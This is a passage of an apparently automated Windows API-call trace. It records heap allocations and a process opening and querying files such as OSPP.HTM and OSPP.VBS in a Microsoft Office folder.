hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0098.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0098.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0098.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.284] AreFileApisANSI () returned 1 [0098.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM", lpUsedDefaultChar=0x0) returned 52 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0098.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.284] AreFileApisANSI () returned 1 [0098.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0098.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0098.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46128, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 52 [0098.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.285] GetFileType (hFile=0x27c) returned 0x1 [0098.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0098.285] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.285] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.286] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.286] CloseHandle (hObject=0x27c) returned 1 [0098.286] AreFileApisANSI () returned 1 [0098.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0098.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0098.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 52 [0098.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.286] GetFileType (hFile=0x27c) returned 0x1 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0098.287] CloseHandle (hObject=0x27c) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.288] AreFileApisANSI () returned 1 [0098.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0098.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0098.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 52 [0098.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd502d600, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd502d600, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x2a9c0)) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.289] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ea17a8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x17103, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OSPP.VBS", cAlternateFileName="")) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0098.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a498 [0098.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0098.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0098.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.290] AreFileApisANSI () returned 1 [0098.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS", lpUsedDefaultChar=0x0) returned 52 [0098.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.290] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.290] AreFileApisANSI () returned 1 [0098.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0098.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0098.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 52 [0098.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.291] GetFileType (hFile=0x27c) returned 0x1 [0098.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0098.291] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.291] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.292] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.292] CloseHandle (hObject=0x27c) returned 1 [0098.292] AreFileApisANSI () returned 1 [0098.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0098.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0098.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 52 [0098.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.292] GetFileType (hFile=0x27c) returned 0x1 [0098.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0098.293] CloseHandle (hObject=0x27c) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.294] AreFileApisANSI () returned 1 [0098.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0098.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0098.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 52 [0098.294] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, 